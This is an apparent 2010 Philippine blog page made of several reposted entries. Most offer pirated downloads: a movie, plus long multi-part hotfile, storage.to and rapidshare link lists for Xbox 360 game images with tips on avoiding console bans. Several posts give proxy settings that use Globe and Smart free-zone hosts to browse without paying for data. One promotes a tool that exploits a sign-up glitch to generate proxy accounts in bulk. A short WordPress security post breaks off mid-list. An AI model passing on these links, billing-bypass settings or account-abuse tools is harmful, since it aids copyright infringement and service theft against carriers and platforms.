- - - - - - - - - - - - - - - please read - - - - - - - - - - - - - - - -

This blogs is not responsible for any wrong post, informations visible and legible. Other posted must be first published and originated by other.

Wednesday, June 30, 2010

Free Movei Downloads

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


1. Knight and Day
MOVIE INFO:
Description: June Havens (Diaz) finds her everyday life tangled with that of a secret agent (Cruise) who has realized he isn’t supposed to survive his latest mission.
Released : 23 June 2010
Starcast : Tom Cruise, Cameron Diaz, Peter Sarsgaard
Duration : 1Hr 44Min
Size : 124 mb
Download here: Try all and find Working server.
Link 1 
Link 2 
Link 3 
Link 4 
Link 5 
Link 6 
Link 7 
link 8 

                   









 



Marvel Ultimate Alliance 2 XBOX360

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



Genre: Action
Region: Region Free/NTSC
Publisher: Activision
Size: 6.48GB

The reasons for not playing before the Retail Date are simple. In a average scenario where the person playing will play online later and has a harddrive and gamertag hooked up. Playing this before the Retail Date will result in a Ban during the next Ban Wave, Which is slated for sometime in Nov. of this year. This is because the Console stores which games have been played and when, Even if your not signed in, Even if your not online. It stores it, and later sends it to Microsoft the next time it goes online. It has been said that even playing without a Harddrive connected the console will still retain this info. I personally havent tested this, nor do i plan to.


DOWNLOAD

http://hotfile.com/dl/12169943/cfabb19/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r00.html
http://hotfile.com/dl/12170081/f64a272/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r01.html
http://hotfile.com/dl/12170179/72550f5/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r02.html
http://hotfile.com/dl/12170272/afda973/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r03.html
http://hotfile.com/dl/12170349/2417b76/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r04.html
http://hotfile.com/dl/12170461/f1249a4/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r05.html
http://hotfile.com/dl/12170534/7a2e1b9/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r06.html
http://hotfile.com/dl/12170654/45af569/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r07.html
http://hotfile.com/dl/12170786/771404c/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r08.html
http://hotfile.com/dl/12170906/53aa123/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r09.html
http://hotfile.com/dl/12171010/2644f73/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r10.html
http://hotfile.com/dl/12171128/f2b8d06/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r11.html
http://hotfile.com/dl/12171248/e72701c/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r12.html
http://hotfile.com/dl/12171358/66993bd/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r13.html
http://hotfile.com/dl/12170184/7ed1aea/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r14.html
http://hotfile.com/dl/12170297/4d0b83f/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r15.html
http://hotfile.com/dl/12170366/2a304e0/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r16.html
http://hotfile.com/dl/12170486/6ab4734/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r17.html
http://hotfile.com/dl/12170559/cf766c3/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r18.html
http://hotfile.com/dl/12170676/6775f39/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r19.html
http://hotfile.com/dl/12170809/92cc0a7/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r20.html
http://hotfile.com/dl/12170923/5f27280/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r21.html
http://hotfile.com/dl/12171031/7e5d570/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r22.html
http://hotfile.com/dl/12171153/3b5a1f1/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r23.html
http://hotfile.com/dl/12171291/e21feea/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r24.html
http://hotfile.com/dl/12171107/3442ed6/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r25.html
http://hotfile.com/dl/12171239/807ddd8/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r26.html
http://hotfile.com/dl/12171347/ce4de1a/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r27.html
http://hotfile.com/dl/12171430/50f0b0e/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r28.html
http://hotfile.com/dl/12171523/e241a64/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r29.html
http://hotfile.com/dl/12171622/a5852a8/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r30.html
http://hotfile.com/dl/12171722/b159f8a/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r31.html
http://hotfile.com/dl/12171737/0e4f6de/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.r32.html
http://hotfile.com/dl/12171834/ec8e08b/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.rar.html
http://hotfile.com/dl/12171835/909d76d/Marvel_Ultimate_Alliance_2_XBOX360-SPARE.sfv.html

Halo 3 ODST X360-Allstars

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


The year is 2552. Covenant forces control the city of New Mombasa. They are searching for something beneath its darkened streets. You are an Orbital Drop Shock Trooper. Your orders: Stay alive, meet up with your scattered squad, and escape the embattled city.

Halo? 3: ODST returns players to familiar ground on a vital, top-secret mission. The gripping story, cooperative campaign and new multiplayer content will have Halo fans ?Preparing to Drop? in Fall 2009. Originally titled Halo 3: Recon, the new game brings the perspective of new characters to the Human-Covenant struggle, as it explores the ODST, or Orbital Drop Shock Troopers.

Deze afbeelding is verkleind. Klik op deze balk om de volledige afbeelding te bekijken. De originele afbeelding is 520x293.

Deze afbeelding is verkleind. Klik op deze balk om de volledige afbeelding te bekijken. De originele afbeelding is 520x293.
 


Code link:

http://www.storage.to/get/P24ptb7w/Halo.3.ODST.X360-Allstars.r00
http://www.storage.to/get/KswrSdX2/Halo.3.ODST.X360-Allstars.r01
http://www.storage.to/get/4lQyl24c/Halo.3.ODST.X360-Allstars.r02
http://www.storage.to/get/xg7iDUsy/Halo.3.ODST.X360-Allstars.r03
http://www.storage.to/get/S2eopLRJ/Halo.3.ODST.X360-Allstars.r04
http://www.storage.to/get/8kxDYaFJ/Halo.3.ODST.X360-Allstars.r05
http://www.storage.to/get/sDQGakNv/Halo.3.ODST.X360-Allstars.r06
http://www.storage.to/get/0dpuSb9I/Halo.3.ODST.X360-Allstars.r07
http://www.storage.to/get/wr9QqmaN/Halo.3.ODST.X360-Allstars.r08
http://www.storage.to/get/Tb6SgFr4/Halo.3.ODST.X360-Allstars.r09
http://www.storage.to/get/05Fiaqoh/Halo.3.ODST.X360-Allstars.r10
http://www.storage.to/get/JHPj34YA/Halo.3.ODST.X360-Allstars.r11
http://www.storage.to/get/O4xzmPJf/Halo.3.ODST.X360-Allstars.r12
http://www.storage.to/get/p3PgDhVx/Halo.3.ODST.X360-Allstars.r13
http://www.storage.to/get/HFte3cL1/Halo.3.ODST.X360-Allstars.r14
http://www.storage.to/get/WVaodWKw/Halo.3.ODST.X360-Allstars.r15
http://www.storage.to/get/RZxWdMyz/Halo.3.ODST.X360-Allstars.r16
http://www.storage.to/get/oCdNMdez/Halo.3.ODST.X360-Allstars.r17
http://www.storage.to/get/7GeQzbd3/Halo.3.ODST.X360-Allstars.r18
http://www.storage.to/get/psvNRs1a/Halo.3.ODST.X360-Allstars.r19
http://www.storage.to/get/Bhivc7RA/Halo.3.ODST.X360-Allstars.r20
http://www.storage.to/get/dj5kkEGf/Halo.3.ODST.X360-Allstars.r21
http://www.storage.to/get/FKUghqdV/Halo.3.ODST.X360-Allstars.r22
http://www.storage.to/get/dfANkcYm/Halo.3.ODST.X360-Allstars.r23
http://www.storage.to/get/pQ89TalE/Halo.3.ODST.X360-Allstars.r24
http://www.storage.to/get/Icy5kO6U/Halo.3.ODST.X360-Allstars.r25
http://www.storage.to/get/KHamKMmJ/Halo.3.ODST.X360-Allstars.r26
http://www.storage.to/get/yWK5mVQ9/Halo.3.ODST.X360-Allstars.r27
http://www.storage.to/get/f8RqyBb7/Halo.3.ODST.X360-Allstars.r28
http://www.storage.to/get/7IhmksYm/Halo.3.ODST.X360-Allstars.r29
http://www.storage.to/get/ezRaDbDD/Halo.3.ODST.X360-Allstars.r30
http://www.storage.to/get/HTvjLLZy/Halo.3.ODST.X360-Allstars.r31
http://www.storage.to/get/OOeIO5dz/Halo.3.ODST.X360-Allstars.r32
http://www.storage.to/get/5ss3G6wH/Halo.3.ODST.X360-Allstars.r33
http://www.storage.to/get/aTsn5PUt/Halo.3.ODST.X360-Allstars.r34
http://www.storage.to/get/yhbNyHs0/Halo.3.ODST.X360-Allstars.r35
http://www.storage.to/get/rSMie3kH/Halo.3.ODST.X360-Allstars.r36
http://www.storage.to/get/LOvLGpkH/Halo.3.ODST.X360-Allstars.r37
http://www.storage.to/get/75ssM6Nj/Halo.3.ODST.X360-Allstars.r38
http://www.storage.to/get/DutEkCC7/Halo.3.ODST.X360-Allstars.r39
http://www.storage.to/get/1x3FA6DF/Halo.3.ODST.X360-Allstars.r40
http://www.storage.to/get/21kGsRpP/Halo.3.ODST.X360-Allstars.r41
http://www.storage.to/get/K2YELwT4/Halo.3.ODST.X360-Allstars.r42
http://www.storage.to/get/3rtgPS2R/Halo.3.ODST.X360-Allstars.r43
http://www.storage.to/get/n3tPUZ1X/Halo.3.ODST.X360-Allstars.r44
http://www.storage.to/get/llg6tNss/Halo.3.ODST.X360-Allstars.r45
http://www.storage.to/get/eDnsBL5H/Halo.3.ODST.X360-Allstars.r46
http://www.storage.to/get/Gmcbk9JF/Halo.3.ODST.X360-Allstars.r47
http://www.storage.to/get/ADF7GSPG/Halo.3.ODST.X360-Allstars.r48
http://www.storage.to/get/V0aPk1L2/Halo.3.ODST.X360-Allstars.r49
http://www.storage.to/get/fLVxbMM4/Halo.3.ODST.X360-Allstars.r50
http://www.storage.to/get/lgz9riLv/Halo.3.ODST.X360-Allstars.r51
http://www.storage.to/get/MhHq3g1x/Halo.3.ODST.X360-Allstars.r52
http://www.storage.to/get/FMcBJiYq/Halo.3.ODST.X360-Allstars.r53
http://www.storage.to/get/o2nNo2OD/Halo.3.ODST.X360-Allstars.r54
http://www.storage.to/get/KYiwvSyT/Halo.3.ODST.X360-Allstars.r55
http://www.storage.to/get/GoZAub9X/Halo.3.ODST.X360-Allstars.r56
http://www.storage.to/get/UMz9Chk5/Halo.3.ODST.X360-Allstars.r57
http://www.storage.to/get/EuCigZYv/Halo.3.ODST.X360-Allstars.r58
http://www.storage.to/get/JrDWPE6O/Halo.3.ODST.X360-Allstars.r59
http://www.storage.to/get/Cww9m9jE/Halo.3.ODST.X360-Allstars.r60
http://www.storage.to/get/ueXo0aUF/Halo.3.ODST.X360-Allstars.r61
http://www.storage.to/get/dFAyByYw/Halo.3.ODST.X360-Allstars.r62
http://www.storage.to/get/sAH9VF0o/Halo.3.ODST.X360-Allstars.r64
http://www.storage.to/get/8ymiv1lv/Halo.3.ODST.X360-Allstars.rar




PAL XBOX360-SWAG

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.




Platform: XBOX 360
Release Date: 9-24-2009
Filenames: sw-st.rxx
Origin/Source: PAL / DVD9
Format: .iso
Languages: EN DE IT SP FR
Region: PAL
Link: http://uk.xbox360.ign.com/objects/142/14263219.html
 

Download link here: 
SWAG1 
sw-st.part02.rar 
sw-st.part03.rar 
sw-st.part04.rar 
sw-st.part05.rar 
sw-st.part06.rar 
sw-st.part07.rar 
sw-st.part08.rar 
sw-st.part09.rar 
sw-st.part10.rar 
sw-st.part11.rar 
sw-st.part12.rar 
sw-st.part13.rar 
sw-st.part14.rar 
sw-st.part15.rar 
sw-st.part16.rar 
sw-st.part17.rar 
sw-st.part18.rar 
sw-st.part19.rar 
sw-st.part20.rar 
sw-st.part21.rar 
sw-st.part22.rar 
sw-st.part23.rar 
sw-st.part24.rar 
sw-st.part25.rar 
sw-st.part26.rar 
sw-st.part27.rar 
sw-st.part28.rar 
sw-st.part29.rar 

Heres the other part, copy the code.

http://rapidshare.com/files/284354796/sw-st.part30.rar
http://rapidshare.com/files/284351668/sw-st.part31.rar
http://rapidshare.com/files/284352333/sw-st.part32.rar
http://rapidshare.com/files/284353388/sw-st.part33.rar
http://rapidshare.com/files/284353527/sw-st.part34.rar
http://rapidshare.com/files/284353609/sw-st.part35.rar
http://rapidshare.com/files/284353722/sw-st.part36.rar
http://rapidshare.com/files/284353643/sw-st.part37.rar
http://rapidshare.com/files/284353489/sw-st.part38.rar
http://rapidshare.com/files/284353605/sw-st.part39.rar
http://rapidshare.com/files/284353771/sw-st.part40.rar
http://rapidshare.com/files/284356401/sw-st.part41.rar
http://rapidshare.com/files/284354199/sw-st.part42.rar
http://rapidshare.com/files/284357950/sw-st.part43.rar
http://rapidshare.com/files/284355703/sw-st.part44.rar
http://rapidshare.com/files/284355245/sw-st.part45.rar
http://rapidshare.com/files/284349899/sw-st.part46.rar
http://rapidshare.com/files/284349959/sw-st.part47.rar
http://rapidshare.com/files/284349964/sw-st.part48.rar
http://rapidshare.com/files/284349906/sw-st.part49.rar
http://rapidshare.com/files/284350024/sw-st.part50.rar
http://rapidshare.com/files/284351554/sw-st.part51.rar
http://rapidshare.com/files/284351597/sw-st.part52.rar
http://rapidshare.com/files/284351608/sw-st.part53.rar
http://rapidshare.com/files/284351501/sw-st.part54.rar
http://rapidshare.com/files/284351615/sw-st.part55.rar
http://rapidshare.com/files/284351701/sw-st.part56.rar
http://rapidshare.com/files/284351688/sw-st.part57.rar
http://rapidshare.com/files/284351707/sw-st.part58.rar
http://rapidshare.com/files/284349887/sw-st.part59.rar
http://rapidshare.com/files/284349936/sw-st.part60.rar
http://rapidshare.com/files/284349975/sw-st.part61.rar
http://rapidshare.com/files/284349941/sw-st.part62.rar
http://rapidshare.com/files/284350569/sw-st.part63.rar

PHProxy+Glype+CGI Updated and still Working

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



PHProxy

ip:dhost.info
port:80
bm:t.globe.com.ph/radwan/ar/index.php

ip:dukehosting.nl
port:80
bm:t.globe.com.ph/surfen/index.php


ip:www5.atpages.jp
port:80
bm:t.globe.com.ph/~laifuer/index.php

ip:www3.tok2.com
port:80
bm:t.globe.com.ph/home/gmodus/index.php

ip:free4.hostrocket.com
port:80
bm:t.globe.com.ph/~hzhostr/index.php


ip:supertnt.com.cn
port:80
bm:t.globe.com.ph/index.php

ip:www5.tok2.com
port:80
bm:t.globe.com.ph/home/hurvinek/index.php

ip:www12.atpages.jp
port:80
bm:t.globe.com.ph/sexkoko/index.php

ip:eatbeef.com.tw
port:80
bm:t.globe.com.ph/phpBB2/includes/index.php

ip:207.8.132.180
port:80
bm:t.globe.com.ph/~david/omgwebsite/poxy-0.4/index.php

ip:www26.tok2.com
port:80
bm:t.globe.com.ph/home/bodycare/index.php

ip:www3.atpages.jp
port:80
bm:t.globe.com.ph/zaqww/p/index.php

ip:216.120.237.78
port:80
bm:t.globe.com.ph/~elaahos/poxy/index.php

ip:www20.atpages.jp
port:80
bm:t.globe.com.ph/vipvip/kusi/index.php

ip:mlxjet.com
port:80
bm:t.globe.com.ph/proxy/index.php

ip:haom.biz
port:80
bm:t.globe.com.ph/index.php

ip:www21.tok2.com
port:80
bm:t.globe.com.ph/home/issunday/index.php

ip:osiris.sunderland.ac.uk
port:80
bm:t.globe.com.ph/~ca4yli/proxy/index.php


ip:server2.lego399.dk
port:80
bm:t.globe.com.ph/prxy/index.php

ip:yildiz.edu.tr
port:80
bm:t.globe.com.ph/~selimay/temp/index.php

ip:thedevcave.net
port:80
bm:t.globe.com.ph/prxy/index.php

ip:battleflower.com
port:80
bm:t.globe.com.ph/yevzodkc.php

ip:ce.sharif.edu
port:80
bm:t.globe.com.ph/~me_ahmadi/rox/index.php

ip:ce.sharif.edu
port:80
bm:t.globe.com.ph/~biria/poxy-0.5b2/index.php

ip:razorrail.com
port:80
bm:t.globe.com.ph/poxy/index.php

ip:bingobottle.com
port:80
bm:t.globe.com.ph/jtckpe.php

ip:galaxypear.com
port:80
bm:t.globe.com.ph/jmqngmzl.php

ip:milkmatrix.com
port:80
bm:t.globe.com.ph/ykwnq.php

ip:braveday.info
port:80
bm:t.globe.com.ph/ycipiyumv.php

ip:koti.mbnet.fi
port:80
bm:t.globe.com.ph/tompz/proxy/index.php
               t.globe.com.ph/tompz/files/proxy/index.php

ip:koti.mbnet.fi
port:80
bm:t.globe.com.ph/jariahie/10th/proxy/index.php

ip:kowalczuk.info
port:80
bm:t.globe.com.ph/index.php

ip:www42.tok2.com
port:80
bm:t.globe.com.ph/home/jiezhou/index.php

ip:swimmingtiger.com
port:80
bm:t.globe.com.ph/whnmtscz.php

ip:clamteaser.com
port:80
bm:t.globe.com.ph/qudqsh.php

ip:mehr.sharif.ir
port:80
bm:t.globe.com.ph/~m_ranjbar/ranjbar.php

ip:proxy.easycloak.com
port:80
bm:t.globe.com.ph/index.php

ip:tscholars.com
port:80
bm:t.globe.com.ph/browser/index.php

ip:anomex.com
port:80
bm:t.globe.com.ph/go/index.php

ip:milkdiver.com
port:80
bm:t.globe.com.ph/ykwnq.php

ip:islief.com
port:80
bm:t.globe.com.ph/poxy/index.php

ip:77.78.60.55
port:80
bm:t.globe.com.ph/PROXY/poxy-0.5b2/index.php

ip:pbosoftware.unavco.org
port:80
bm:t.globe.com.ph/dims/poxy-0.4/index.php

ip:www8.atpages.jp
port:80
bm:t.globe.com.ph/awakedream/phproxy/index.php



GLYPE proxy

ip:www11.atpages.jp
port:80
bm:t.globe.com.ph/laevatein/browse.php

ip:140.114.75.99
port:80
bm:t.globe.com.ph/~hkchen/glype/upload/index.php


ip:www20.atpages.jp
port:80
bm:t.globe.com.ph/vipvip/glype-1.1/upload/index.php

ip:web.tubko.cz
port:80
bm:t.globe.com.ph/web/index.php

ip:px4u.info
port:80
bm:t.globe.com.ph/browse.php

ip:redirect.tk
port:80
bm:t.globe.com.ph/glype/index.php


ip:wadi12.com
port:80
bm:t.globe.com.ph/go/wd6/browse.php

ip:maylandswireless.net
    dyrion.net
port:80
bm:t.globe.com.ph/glype/browse.php


ip:dailidaili.com
    daili.vc
    httproxy.net.ru
port:80
bm:t.globe.com.ph/index.php

ip:nightknight.info
port:80
bm:t.globe.com.ph/browse.php


ip:iransafebrowse.com
    iransafesearch.com
    iransafeproxy.com
port:80
bm:t.globe.com.ph/index.php

ip:77.78.60.55
port:80
bm:t.globe.com.ph/PROXY/glype-1.1/upload/browse.php

ip:174.121.12.250
port:80
bm:t.globe.com.ph/~wm5info/dns/vpn/browse.php

ip:totalorganization.com
port:80
bm:t.globe.com.ph/wint3roxy/browse.php

ip:209.25.221.54
port:80
bm:t.globe.com.ph/proxy/browse.php

ip:ssl-tunnel.com
port:80
bm:t.globe.com.ph/index.php

ip:web-proxy.org
port:80
bm:t.globe.com.ph/index.php

CGIproxy

ip:1.college-source.net
port:80
homepage/frontquery:t.globe.com.ph/p/nph-erp.cgi/pinoyden/http/
remove port:marked x
useproxy:host
proxyserver:1.college-source.net/p/nph-erp.cgi/pinoyden/http/

Working GOOGLEMAPS for SMART and GL0BE for Free

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


 This tricks is tested and working for my N95 phone.
 Download google maps handler here:
 SERVER SETTINGS :
  • for GL0BE : use MYGLOBE INET
  • for SMART : use SMARTINTERNET
PSA : whoidleswins.com or 95.172.21.74
P0RT :80
H0MEPAGE :
(SMART) :  http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

(GL0BE) :
http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/


GMAPS SETTINGS :

FR0NT QUERY : W/out http
(SMART) : clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/
(GL0BE) : t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

REM0VE P0RT FR0M URL : checked
HTTP Proxy/Host : whoidleswins.com or 95.172.21.74
(NOTE: LEAVE OTHERS BLANK)

OTHER SERVER FOR G0OGLEMAPS :
for SMART and GL0BE :


PSA : 208.80.96.136

P0RT : 80

H0MEPAGE :
(SMART) : http://clickhere.ph/cgi-bin/nph-045959.cgi/1A/http/

(GLOBE) : http://t.globe.com.ph/cgi-bin/nph-045959.cgi/1A/http/

Bolt handler free browse using cgi proxy

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


Before we proceed to for cgi trick intruction you will need to download the bolt handler or download it here 
 Use this connections
  • For GL0BE : Use MYGLOBE INET
  • For SMART : Use SMARTINTERNET

PSA : whoidleswins.com or 95.172.21.74

P0RT : 80

H0MEPAGE :
(Smart) : http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

(Globe) : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

B0LT SETTINGS :

FR0NT QUERY :

(Smart) : http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

(Globe) : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

REM0VE P0RT FR0M URL : checked or crossed

USE PROXY : Host

PR0XY SERVER : whoidleswins.com or 95.172.21.74

(N0TE : LEAVE OTHERS BLANK)


DOWNLOADING CAPABLE :

other CGI Proxies for this APPLICATI0N :

credit to the DISCOVERERS :

for SMART and GL0BE :
PSA : unknown-6076.agava.net or 89.108.110.170
P0RT : 80
H0MEPAGE : http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

for GL0BE only :

PSA : 74.53.161.68
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgiproxy/nph-proxy.pl/1A/http/

credit to ACEBRYANT :

PSA : fireopal.org or 209.134.132.36
P0RT :80
H0MEPAGE : http://t.globe.com.ph/cgi-bin/nph-myweb.cgi/0/http/

PSA : dugaldallen.com or 66.166.196.253
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgi-bin/cgiproxy/nph-proxy.pl/1A/http/

credit to AQUAMAN :

PSA : 87-98-243-193.ovh.net or 87.98.243.193
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgiproxy/nph-proxy.pl/aquaman/http/

credit to ZI0N108 :

PSA : proxy.jackspartyhouse.com or 67.117.201.129
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/010110A/http/

credit to SCREAM :

PSA : web-proxy.org.ua or 194.44.18.86
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/nph-proxy.cgi/scream/http/



Tuesday, June 29, 2010

Cproxy Instant Account Generator

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



Download Here Cproxy 2.0 
                           CPoxy debug Mode.rar  
                            Cproxy Mini V2.rar
                           Cpoxy AeroVersion.rar


Requirements

- 3 gmail accounts
- Internet Explorer Web Connection
- My fullname


Functions

- can generate 3 accounts in just one click
- no disposable or instant email address used
- the gmails may last for a week or even months depending on its length (the longer your email name the better) as long as it is not blocked
- autorefresh at startup
- with minimize function as requested by Frankogus16
- new worldclass mailserver
- it will send emails in your selected gmail account


Where is Version 1.0?

- It is what Im using right now but this is much better that's why it was released as Version 2.0, Version 1.0 is my personal CIAG.


How to use it?


- After you download the program just run the program then wait until the captchas appear.
- Change the mail storage with your valid gmail accounts.
- Input the Captchas and hit the sign up button.
- You can see further instructions on the program when you clicked the About>Program Guide

Screenshots

Image1 - the messages in my gmail account after i used the CIAG Version 2.0 by Hayato
(How could it be?... 4 registration accounts in one email?????? Impossible?) No, Its not... Its GLITCH


File Resized (Right Click then View Image to Enlarge)

Image2
- Graphical User Interface of the program. I know you know now how to use it.


File Resized (Right Click then View Image to Enlarge)

Image3 - GUI Forms (The message forms of the program.)


File Resized (Right Click then View Image to Enlarge)

Aero Version
Input the Captcha and click sign up
If you are prompted to refresh the page
Click retry every 5 minutes try to click retry ^^,

Troubleshooting

Try this if you have missing dll problems or if using different OS
For trouble shooting
COMCTL32.OCX

Registration Failed Error
Try to download the miniversion 2.0
1 gmail 1 account


Recommendations
Version 2.0 was recommended for those who have fast internet connection
Mini Version 2.0 was recommended for those having some troubles in their internet connection


Cgi and phproxy for smart and globe Updated

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.





For GL0BE only (PHProxies)
PSA : gtmick.com
 or 64.17.137.146
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/photo/index.php

PSA : rayafar.biz or 67.217.50.137
(for use wap.smart.com.ph and change 
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/pr/index.php
 
 
For SMART and GL0BE tested (PHProxies)
(For smart Use http:// wap.smart.com.ph and change the http://t.globe.com.ph
PSA : adilam.homeip.net or 183.178.149.124
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/proxy/index.php

PSA : tatunet.ddo.jp or 125.198.116.16
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/proxy/index.php

PSA : www.mnrh.in.th or 203.154.66.67
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/proxy/index.php

PSA : www10.atpages.jp
 or 202.171.155.137
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/webprx/web_proxy.cgi/aquaman/http/

(BEST for G0OGLEMAPS and OM)

for GL0BE only (CGI Proxies)
PSA : cpe-24-165-118-251.cinci.res.rr.com or 24.165.118.251
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgi-bin/nph-619780.cgi/1A/http/

PSA : host46.webservices.net or 216.120.234.101
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/~dtagcom/phr/cgi-bin/cgiproxy/nph-proxy.cgi/aquaman/http/

PSA : c-68-58-56-154.hsd1.in.comcast.net or 68.58.56.154
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/

for GL0BE (BUILT IN and OPERA 8.65 Only) 
PSA : mfp.hostwindsor.com or 74.50.97.246
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/nph-index.cgi

PSA : myproxy.ca or 74.50.97.246
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/q/nph-index.cgi

PSA : pzeg.com or 74.50.97.245
P0RT : 80
H0MEPAGE : http://t.globe.com.ph/q/nph-index.cgi

for SMART and GLOBE (CGI Proxies)
 ( change the freesite to wap.smart.com.ph or any freesite of smart)
 PSA : 208.80.96.136
P0RT : 80
H0MEPAGE : http:///FREESITE/cgi-bin/nph-045959.cgi/aquaman/http/

PSA : zxtm-01-ti-1.utdallas.edu or 129.110.10.36
P0RT : 80
H0MEPAGE :
(for BUILT-IN) : http://FREESITE/~brianm/nph-proxy.cgi

PSA : kangzhuang.ucam.org or cpc5-cmbg15-2-0-cust236.know.cable.virginmedia.com or 86.30.204.237
P0RT : 80
H0MEPAGE : http://FREESITE/cgi-bin/access/access.cgi/aquaman/http/

PSA : rev.opentransfer.com.93.91.0.96.in-addr.arpa or od88.cn or 96.0.91.93
P0RT : 80
H0MEPAGE : http://FREESITE/index.cgi/aquaman/http/

PSA : unknown.ord.scnet.net or 75.102.7.39
P0RT : 80
H0MEPAGE : http://FREESITE/cgi-bin/cgiproxy/nph-proxy.pl/aquaman/http/

PSA : www.ra.sakura.ne.jp or 210.188.226.3
P0RT : 80
H0MEPAGE :
(BUILT IN) : http://FREESITE/~senbo/fakedp/startproxy.cgi/aquaman/http/

PSA : 97-74-194-98.ip.secureserver.net or 97.74.194.98
P0RT : 80
H0MEPAGE : http://FREESITE/cgi-bin/nph-proxy.cgi/aquaman/http/



Use this for Opera mini handler, multi, editable.


PSA : 97-74-194-98.ip.secureserver.net or 97.74.194.98
P0RT : 80
H0MEPAGE :
(SMART) : http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

(GL0BE) : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

OM4.2 SET :

CUST0M HTTP SERVER :
(SMART) : http://clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

(GL0BE) : http://t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

FR0NT QUERY :
(SMART) : clickhere.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

(GL0BE) : t.globe.com.ph/cgi-bin/nph-proxy.cgi/aquaman/http/80.239.242.49:80/

CUST0M S0CKET SERVER : socket://server4.operamini.com:1080

REM0VE P0RT FROM URL : crossed

H0ST :
(SMART) : clickhere.ph

(GL0BE) : t.globe.com.ph


(N0TE : LEAVE OTHERS BLANK)




Secure Your Wordpress Blog

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.
Many famous blogs have been hacked and defamed before. To avoid the same disaster from happening to your own blog, you can try the tips below to make your Wordpress blog more secure, at least from the view of script kiddies.
Tip 1 :Remove Wordpress ‘version string’ in your theme files
  1. Go to Wordpress dashboard, click on presentation -> edit themes -> header.php
  2. Find and remove this. bloginfo('version') Save the file.
Explanation: Hide the version number of your Wordpress such that it will be hard for hacker to find security loopholes for the specific version of Wordpress.

Tip 2 :P lace empty ‘index.html’ file in the plugins folder
  1. Open Notepad. Click ’save as’ and save the file as index.html (be sure to change the filetype from text files to all files)
  2. Upload the file to Wordpress plugins folder in your web server.
Explanation: Hide the plugins used by your Wordpress blog. It uses the same concept as above which is to hide security loopholes in the plugins.
Tip 3: Upload a copy of .htaccess file in the wp-admin folder
